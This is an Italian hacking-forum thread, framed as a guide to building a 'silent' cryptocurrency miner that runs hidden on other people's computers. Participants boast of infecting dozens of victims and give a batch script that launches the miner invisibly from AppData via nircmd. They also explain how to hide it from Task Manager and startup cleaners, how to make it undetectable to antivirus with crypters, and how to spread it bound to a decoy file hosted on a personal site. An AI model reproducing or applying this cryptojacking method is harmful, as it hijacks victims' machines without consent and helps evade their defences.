Hyip [GUIDA] Creare un Silent GPU Miner per Bitcoin

Stato
Discussione chiusa ad ulteriori risposte.
Cerca su google mettendo impostazioni di tempo negli ultimi giorni
QUALCUNO MI SAPREBBE DIRE PERCHè IL MINER NON SI AVVIA DOPO CHE HO CLICCATO SUL INSTALLER?Sul sito del download vedo che è stato scaricato il file e c'è anche la cartella del miner su appdata ma quando cancello la cartella del miner da appdata non mi dice che c'è un file aperto all'interno DDDD:
 
Ragazzi dobbiamo cercare il modo di rendere il processo invisibile per i primecoin, e ci sono diversi problemi:

1. Se lo facciamo per primecoin, si nota l'aumento delle prestazioni cpu nel task manager, anche se il pc non viene rallentato.
2. Se lo facciamo per BTC quindi con la GPU, ci vorrebbero anni e anni per guadagnare qualcosa vista la difficoltà di mining dei BTC.
 
Ultima modifica:
Comunque bisogna trovare un metodo per nascondere il mining sia con cpu che con gpu perchè ccleaner individua che all'avvia di windows verrà avviato il file start quindi da li si può tranquillamente eliminare il silent miner...
Io ho infettato almeno una quarantina di persone ma molte (oltre i 4/5) hanno trovato il modo per non far avviare il miner
 
  • Mi piace
Reazioni: andryk99
Comunque bisogna trovare un metodo per nascondere il mining sia con cpu che con gpu perchè ccleaner individua che all'avvia di windows verrà avviato il file start quindi da li si può tranquillamente eliminare il silent miner...
Io ho infettato almeno una quarantina di persone ma molte (oltre i 4/5) hanno trovato il modo per non far avviare il miner

grazie a te ho scoperto di essere infetto da un miner virus
Grazie ;)
 
Ma ragazzi io in rete ho trovato un silent miner craccato ma è del fine 2011 non so se funge ancora cmq si chiama kMiner v2 craccato e qualcuno che ne sa qualcosa sui silent piu di me mi potrebbe dire se funge?
Ecco il post :
http://www.hackforums.net/showthread.php?tid=1480994

- - - Updated - - -

:sisi: Stavi parlando di come minare Primecoin usando questa guida? :sisi:
Perchè se fosse così allora si spiega molte cose :asd:

Ho già provato io a farne una con Primecoin, Litecoin e Protoshares; ognuna funziona perfettamente ma purtroppo sussiste un problema:
- Il processore non è invisibile, è possibile cambiarne il nome ma la quantità di CPU che usa è pari a 25 usando 1 Thread di 8MB quindi desterebbe troppo nell'occhio.

Per creare un'altro Silent Miner per Primecoin o altre monete, servono codici del tutto differenti rispetto a questa guida; ma, come già detto, il problema è il processore che non può essere nascosto.

- - - Updated - - -


L'errore exec si presenta quando immetti percorsi errati o applicazioni inesistenti; controlla di non aver tralasciato virgolette e che i nomi siano esatti.
In alternativa, uppa i tuoi file che cerco di individuare e correggere l'errore.
Ho sistemato il errore, ma ho provato a diffondere il silent e adesso ho 20 bot infetti compreso i miei due pc, ma non sò perchè non ho una briciola di hashrate su eligius?ho provato ad eseguire cgminer scaricato sul mio pc con la scehda video potente e cgminer mi dice : No devices found!
LOOOOOOOOOOOOOOOL AIUTO!!!!
 
Strano, prova a scaricare ProcessExplore (non richiede installazione); infettati da solo con il miner e poi cerca il processo cgminer.exe
 
  • Mi piace
Reazioni: kronozfx
Ma ragazzi io in rete ho trovato un silent miner craccato ma è del fine 2011 non so se funge ancora cmq si chiama kMiner v2 craccato e qualcuno che ne sa qualcosa sui silent piu di me mi potrebbe dire se funge?
Ecco il post :
http://www.hackforums.net/showthread.php?tid=1480994

- - - Updated - - -


Ho sistemato il errore, ma ho provato a diffondere il silent e adesso ho 20 bot infetti compreso i miei due pc, ma non sò perchè non ho una briciola di hashrate su eligius?ho provato ad eseguire cgminer scaricato sul mio pc con la scehda video potente e cgminer mi dice : No devices found!
LOOOOOOOOOOOOOOOL AIUTO!!!!

Craccato che dovrebbe farti ottenere più Bitcoin del normale ?
 
Strano, prova a scaricare ProcessExplore (non richiede installazione); infettati da solo con il miner e poi cerca il processo cgminer.exe
Il processo c'è,ma il fatto è che ho provato ad eseguire il silent miner in modalità NON SILENT e mi esce su tutti e due PC il errore No devices found!
e poi smanettando su google ho letto che cgminer mina solo dispositivi asci e altri device esterni appositamente creati per minare,sarà per questo che non mina le gpu?
 
Come hai fatto o_O?


SET NRCMD="%appdata%\miner\nircmd.exe"
SET ARG1=-u username
SET ARG2=-p password -I d
SET ARGNRCMD=exec hide
SET ARG0=-o stratum+tcp://stratum.mining.eligius.st:3334
SET MINER="%appdata%\miner\protosharesminer.exe"
%NRCMD% %ARGNRCMD% %MINER% %ARG0% %ARG1% %ARG2%

dove sta scritto protosharesminer.exe basta che metti il nome del miner che vuoi usare.. naturalmente i file che dovrai utilizzare dopo saranno quelli del miner che hai scritto li e non di cgminer.exe

 
SET NRCMD="%appdata%\miner\nircmd.exe"
SET ARG1=-u username
SET ARG2=-p password -I d
SET ARGNRCMD=exec hide
SET ARG0=-o stratum+tcp://stratum.mining.eligius.st:3334
SET MINER="%appdata%\miner\protosharesminer.exe"
%NRCMD% %ARGNRCMD% %MINER% %ARG0% %ARG1% %ARG2%

dove sta scritto protosharesminer.exe basta che metti il nome del miner che vuoi usare.. naturalmente i file che dovrai utilizzare dopo saranno quelli del miner che hai scritto li e non di cgminer.exe


Questo l'avevo fatto da solo ma il nome utente dove lo metto?

Inviato dal mio HTC Desire 500 utilizzando Tapatalk

- - - Updated - - -

Ho provato, e ha funzionato, tuttavia ad antivirus spento, infatti puoi sempre criptare l'installer, ma esso installerà a sua volta altre componenti come .bat che vengono rilevati immediatamente quando vengono installati in Appdata, quindi è utile solo in caso la vittima non ha un antivirus.
e se cripti anche i bat? dovrebbe diventare non rilevabile
 
cioe hai il coraggio di chiedermi il nome utente dove lo devi mettere? o_O sai almeno username che vuol dire?

Si XD pensavo si dovesse cambiare anche quel tipo di impostazioni scrivendo una stringa diversa invece a quanto vedo basta sostituire il miner (l'avevo fatto da solo ma come ho detto pensavo dovessi cambiare qualche stringa di testo)

Inviato dal mio HTC Desire 500 utilizzando Tapatalk
 
Si XD pensavo si dovesse cambiare anche quel tipo di impostazioni scrivendo una stringa diversa invece a quanto vedo basta sostituire il miner (l'avevo fatto da solo ma come ho detto pensavo dovessi cambiare qualche stringa di testo)

Inviato dal mio HTC Desire 500 utilizzando Tapatalk

no devi lasciare tutto cosi com'e al massimo aggiungere qualcosa solo se sei uno esperto e aggiungere cose per far avviare il miner in modalita diversa tipo con piu o meno ram o cose cosi
 
Ultima modifica:
Creato un miner adattato per pts. Lo trovate in firma. (se vi ho aiutato in qualche modo scaricate ). non è criptato e potete estrarlo e vedere come l'ho settato per i source mandatemi mp :D
(aggiungi come mettere altri argomenti (es i thread da utilizzare nel caso degli xpm e pts senno ti parte la cpu al 100 % :))
 
Creato un miner adattato per pts. Lo trovate in firma. (se vi ho aiutato in qualche modo scaricate ). non è criptato e potete estrarlo e vedere come l'ho settato per i source mandatemi mp :D
(aggiungi come mettere altri argomenti (es i thread da utilizzare nel caso degli xpm e pts senno ti parte la cpu al 100 % :))
Grazie per il programma. Mi potresti dire come posso "disinfettarmi"? Vorrei infettare il mio stesso pc, per poi disinstallarlo se non va bene.
 
Andryk99 tu come fai ad infettare gli altri pc, cosa usi? Inoltre li infetti con Silent Miner di BitCoin o di Protoshare?

Io non sto usando questo virus qua perché avast lo rileva (anche se lo userei per protoshares) e la maggioranza delle persone che sanno poco di computer usano avast, io al momento uso un Builder di virus bitcoin anche se ora non più perché il mio cripter non è più FUD .
Per infettare altri pc bindo due file (un file e il virus) e lo carico sul mio sito altervista in modo da avere un link diretto
P.S. se vuoi avere più informazioni puoi contattarmi in privato o chiedere nel forum a [MENTION=75764]MICIO[/MENTION] per esempio che se ne intende di mining virus

Inviato dal mio HTC Desire 500 utilizzando Tapatalk
 
  • Mi piace
Reazioni: Castell Saiyan
Grazie per il programma. Mi potresti dire come posso "disinfettarmi"? Vorrei infettare il mio stesso pc, per poi disinstallarlo se non va bene.
per disinfettare il tuo pc usa il link che ti ho mandato in mp :) (cmq il fiel è aperto (nessun blinder e caricato sul mio sito (spazio web)
io per ora non l'ho fatto installare a nessuno senza il loro consenso :). Devo ancora sistemare quello chiuso per bene
 
Stato
Discussione chiusa ad ulteriori risposte.